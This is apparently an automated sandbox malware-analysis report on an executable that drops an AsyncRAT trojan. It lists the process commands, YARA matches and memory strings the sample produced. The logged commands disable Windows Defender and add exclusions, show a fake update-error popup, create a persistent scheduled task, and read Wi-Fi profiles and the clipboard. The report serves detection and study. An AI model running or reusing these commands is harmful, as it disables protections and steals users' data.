Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Code function: 84_2_00007FF71F0942E0	84_2_00007FF71F0942E0
Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Code function: 84_2_00007FF71F0E1314	84_2_00007FF71F0E1314
Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Code function: 84_2_00007FF71F0D2164	84_2_00007FF71F0D2164
Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Code function: 84_2_00007FF71F0D81CC	84_2_00007FF71F0D81CC
Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Code function: 84_2_00007FF71F0F41CC	84_2_00007FF71F0F41CC
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 85_2_00007FFD9A8E12E9	85_2_00007FFD9A8E12E9
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 85_2_00007FFD9A8E0E98	85_2_00007FFD9A8E0E98
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 105_2_00007FFD9A8B12E9	105_2_00007FFD9A8B12E9
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 105_2_00007FFD9A8B0E98	105_2_00007FFD9A8B0E98
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 107_2_00007FFD9A8E12E9	107_2_00007FFD9A8E12E9
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 107_2_00007FFD9A8E0E98	107_2_00007FFD9A8E0E98
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 110_2_00007FFD9A8C12E9	110_2_00007FFD9A8C12E9
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 110_2_00007FFD9A8C0E98	110_2_00007FFD9A8C0E98
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 111_2_00007FFD9A8F12E9	111_2_00007FFD9A8F12E9
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 111_2_00007FFD9A8F0E98	111_2_00007FFD9A8F0E98

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: String function: 00007FF644872710 appears 104 times
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: String function: 00007FFDFF191325 appears 109 times
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: String function: 00007FFDFAED9330 appears 135 times
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: String function: 00007FFDFAF01E20 appears 33 times
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: String function: 00007FFDFF20C181 appears 219 times
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: String function: 00007FF644872910 appears 34 times
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: String function: 00007FFDFF20C16F appears 66 times
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: String function: 00007FFDFAEDA490 appears 162 times
Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Code function: String function: 00007FF71F0A8444 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Code function: String function: 00007FF71F0D49F4 appears 53 times

Source: sB2ClgrGng.exe

Static PE information: invalid certificate

Source: rar.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: sB2ClgrGng.exe	Binary or memory string: OriginalFilename vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000000.00000003.1756191157.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000000.00000000.1755836126.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBthUdTask.exej% vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe	Binary or memory string: OriginalFilename vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000001.00000002.2201150684.00007FFE13398000.00000004.00000001.01000000.0000000C.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000001.00000002.2200775654.00007FFE13213000.00000004.00000001.01000000.00000011.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000001.00000002.2200251845.00007FFE11EE4000.00000004.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000001.00000002.2201493725.00007FFE14649000.00000004.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000001.00000000.1763102374.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBthUdTask.exej% vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000001.00000002.2199296110.00007FFE0EC02000.00000004.00000001.01000000.0000000E.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000001.00000002.2201810199.00007FFE148BC000.00000004.00000001.01000000.0000000D.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000001.00000002.2200490411.00007FFE130CC000.00000004.00000001.01000000.00000012.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000001.00000002.2196648212.00007FFDFAEA0000.00000004.00000001.01000000.0000000F.sdmp	Binary or memory string: OriginalFilenamelibcryptoH vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000001.00000002.2195399422.00007FFDF8669000.00000004.00000001.01000000.00000016.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000001.00000002.2199598178.00007FFE0EC33000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000001.00000002.2199936374.00007FFE0EC6C000.00000004.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmp	Binary or memory string: OriginalFilenamelibsslH vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000001.00000002.2202060831.00007FFE148D9000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000001.00000002.2198442898.00007FFDFB707000.00000004.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamepython312.dll. vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe, 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs sB2ClgrGng.exe
Source: sB2ClgrGng.exe	Binary or memory string: OriginalFilenameBthUdTask.exej% vs sB2ClgrGng.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: Commandline size = 3647	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Source: 15.0.bound.exe.2f0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000F.00000000.1789335378.00000000002F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\word.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: libcrypto-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.999059198943662
Source: libssl-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9916915494109948
Source: python312.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9993773228216073
Source: sqlite3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.997848412298387
Source: unicodedata.pyd.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9935930524553571

Source: word.exe.15.dr, t59oPSjC0CT.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: word.exe.15.dr, t59oPSjC0CT.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: word.exe.15.dr, VpHhD0XCMxd.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: word.exe.15.dr, eO6GW79PYldYZmhf60USdfbHoGhiqOgoEJlFPK0g04oze8GBTbSWTryxgq2oxwnScpMQ.cs

Base64 encoded string: 'ljEVtBJ3z/kiMBccvclQVimpRhxVt9iI6MqIaT/ViJ1qrGodEmEjFGEmw/7Hd2/n'

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@172/70@2/4

Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe

Code function: 84_2_00007FF71F0ACAFC GetLastError,FormatMessageW,

84_2_00007FF71F0ACAFC

Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Code function: 84_2_00007FF71F0AEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		84_2_00007FF71F0AEF50
Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Code function: 84_2_00007FF71F0DB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,		84_2_00007FF71F0DB57C

Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe

Code function: 84_2_00007FF71F0B3144 GetDiskFreeSpaceExW,

84_2_00007FF71F0B3144

Source: C:\Users\user\AppData\Local\Temp\bound.exe

File created: C:\Users\user\AppData\Roaming\word.exe

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Mutant created: \Sessions\1\BaseNamedObjects\C
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8800:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5772:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8636:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4564:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2996:120:WilError_03
Source: C:\Users\user\AppData\Roaming\word.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8320:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3736:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8252:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8484:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2588:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8684:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8748:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2596:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9188:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7900:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Mutant created: \Sessions\1\BaseNamedObjects\tqSXJejMVjIDSKyY

Source: C:\Users\user\Desktop\sB2ClgrGng.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI58162

Jump to behavior

Source: sB2ClgrGng.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\word.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\bound.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\sB2ClgrGng.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: sB2ClgrGng.exe, 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: sB2ClgrGng.exe	ReversingLabs: Detection: 52%
Source: sB2ClgrGng.exe	Virustotal: Detection: 67%

Source: sB2ClgrGng.exe	String found in binary or memory: set-addPolicy
Source: sB2ClgrGng.exe	String found in binary or memory: id-cmc-addExtensions
Source: sB2ClgrGng.exe	String found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
Source: sB2ClgrGng.exe	String found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
Source: sB2ClgrGng.exe	String found in binary or memory: --help
Source: sB2ClgrGng.exe	String found in binary or memory: --help
Source: sB2ClgrGng.exe	String found in binary or memory: can't send non-None value to a just-started generator
Source: sB2ClgrGng.exe	String found in binary or memory: can't send non-None value to a just-started async generator
Source: sB2ClgrGng.exe	String found in binary or memory: can't send non-None value to a just-started coroutine

Source: C:\Users\user\Desktop\sB2ClgrGng.exe

File read: C:\Users\user\Desktop\sB2ClgrGng.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\sB2ClgrGng.exe "C:\Users\user\Desktop\sB2ClgrGng.exe"
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Users\user\Desktop\sB2ClgrGng.exe "C:\Users\user\Desktop\sB2ClgrGng.exe"
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'"
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "start bound.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
